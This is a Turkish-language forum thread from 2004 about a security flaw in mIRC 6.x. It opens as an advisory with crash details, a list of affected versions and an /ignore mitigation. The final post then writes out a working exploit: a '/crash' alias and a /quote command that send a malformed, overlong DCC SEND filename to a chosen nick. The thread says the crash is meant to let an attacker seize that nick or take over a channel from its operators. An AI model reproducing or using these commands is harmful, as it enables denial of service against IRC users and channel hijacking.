Cevapla
 
Konu Araçları
Eski 29-03-04, 14:25 #1
CaN CaN çevrimdışı
Varsayılan mIRC v6.12 surumundeki guvenlik acigi

12 Ekim 2003'de en populer sohbet programi mIRC'in 6.* surumlerini etkileyen bir guvenlik acigi bulundu. Eger size saldirirlarsa mIRC "Bu program gecersiz bir islem yuruttu ve kapatilacak" hatasi veriyor ve mecburen kapatiliyor.



Ve gelen hata mesajinin ayrintilari;

MIRC, geçersiz sayfa hatasina neden oldu;
birim: MIRC.EXE konum 019f:004edf60.
Yazmaçlar:
EAX=fffffffe CS=019f EIP=004edf60 EFLGS=00010282
EBX=0081e178 SS=01a7 ESP=0081c9dc EBP=0081e108
ECX=00000000 DS=01a7 ESI=0081cb42 FS=adaf
EDX=0081ca20 ES=01a7 EDI=0081e158 GS=0000
CS:EIP:'deki Baytlar
8a 18 84 db 0f 85 4b ff ff ff c6 45 00 00 5f 5e
Yigin dökümü:
00000000 00000029 0081d5e8 0081e108 0000002a 0081ca20 004566ed 0081e108 00000180 00000000 00f5804c 0081d5e8 00000002 00000001 00f5804c 00000ad0

Bu guvenlik acigini tasiyan surumler;
mIRC 6.11
mIRC 6.1
mIRC 6.03
mIRC 6.02
mIRC 6.01
mIRC 6.00
Bu aciktan dolayi eski bir surum kullanmanizida tavsiye etmiyorum cunku eski surumlerde de bilinen aciklar var.
mIRC'in yapimcisi Khaled resmi guncellemeyi yakinda yapacagini acikladi...



--------------------------------------------------------------------------------

Bu guvenlik acigindan resmi yeni surum cikana kadar
/ignore -wd *
komutunu mIRC'de yazarak korunabilirsiniz.


--------------------------------------------------------------------------------



Bu komut ne ise yarar?
Bu komut basitce butun DCC alis-verislerini kapatir. Komuttaki -d DCC'i, -w 'de baglandiginiz butun serverlarda ignore etmenizi saglar.
Ignore komutu hakkinda ayrintili bilgiyi Ingilizce olarak mIRC'de "/help /ignore" yazarak gorebilirsiniz.

Simdi nasil dosya indirecegim?
DCC'i ignore ettigimiz icin kimseden dosya alamazsiniz. Eger almak istiyorsaniz "/ignore -x nickname" yazarak o kisinin size dosya gondermesine izin verebilirsiniz. Fakat o kiside size bu guvenlik acigiyla zarar verebilir. O yuzden bunu SADECE guvendiginiz insanlar icin uygulayin.

Bu guvenlik acigi nedir? Nasil uygulanir?
Bu acigin detaylarini, nasil isledigini anlatamam cunku henuz herkes bu aciktan korunmuyor. Belki resmi yeni surum ciktiktan sonra...

Bu saldiri bana ne gibi zarar verir?
Bu saldiri *SADECE* mIRC'in kapanmasina yol acar. Boylelikle saldirgan nick'inizi ele gecirebilir yada bir kanaldaki oplara saldirip kanali ele gecirebilir.


Mircin son versiyonu v6.14 buradan indire bilirsiniz . http://www.ircoper.com/mirc/mirc614.exe
__________________
  Alıntı Yaparak CevaplaAlıntı Yaparak Cevapla
Eski 05-04-04, 22:31 #2
PASSMAN PASSMAN çevrimdışı
Varsayılan Cvp: mIRC v6.12 surumundeki guvenlik acigi


Senden isteğimiz bunu bizimle paylaşman RICA EDIYORUZ.
  Alıntı Yaparak CevaplaAlıntı Yaparak Cevapla
Eski 05-04-04, 22:40 #3
CaN CaN çevrimdışı
Varsayılan Cvp: mIRC v6.12 surumundeki guvenlik acigi


Bunu yazarım ama insanlar bunu kötü niyetli kullanabilir, Ayrica bir çok server buna önlem aldı işleyen pek azdir ama genede bir çok yerde işliyor, ayrica ban hatta akill bile yiyebilirsiniz.
  Alıntı Yaparak CevaplaAlıntı Yaparak Cevapla
Eski 05-04-04, 23:03 #4
NetWork NetWork çevrimdışı
Varsayılan Cvp: mIRC v6.12 surumundeki guvenlik acigi

ceptocan ben kodu biliyorum.. ama sen yinede yaz zaten heryerde var ve çoğu server önlemini aldı.. Millet bilsin
  Alıntı Yaparak CevaplaAlıntı Yaparak Cevapla
Eski 05-04-04, 23:13 #5
CaN CaN çevrimdışı
Varsayılan Cvp: mIRC v6.12 surumundeki guvenlik acigi

buyrun isteyene

/crash { raw PRIVMSG $$1 :DCC SEND "x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x ::x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x" 0 }



Connectin reset yapar
/quote PRIVMSG Nick :DCC SEND "x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x

Mesajı son düzenleyen CaN ( 05-04-04 - 23:42 )
  Alıntı Yaparak CevaplaAlıntı Yaparak Cevapla
Cevapla

Bu konunun kısa yolunu aşağıdaki sitelere ekleyebilirsiniz

Konu Araçları

Gönderme Kuralları
Yeni konu açamazsınız
Cevap yazamazsınız
Dosya gönderemezsiniz
Mesajlarınızı düzenleyemezsiniz

BB code is Açık
Smiley Açık
[IMG] kodu Açık
HTML kodu Kapalı



Tüm saatler GMT +3. Şuan saat: 11:10
(Türkiye için artık GMT +3 seçilmelidir.)

 
5651 sayılı yasaya göre forumumuzdaki mesajlardan doğabilecek her türlü sorumluluk yazan kullanıcılara aittir. Şikayet Mailimiz. İçerik, Yer Sağlayıcı Bilgilerimiz. Reklam Mailimiz. Gizlilik Politikası. Tatil
Copyright © 2019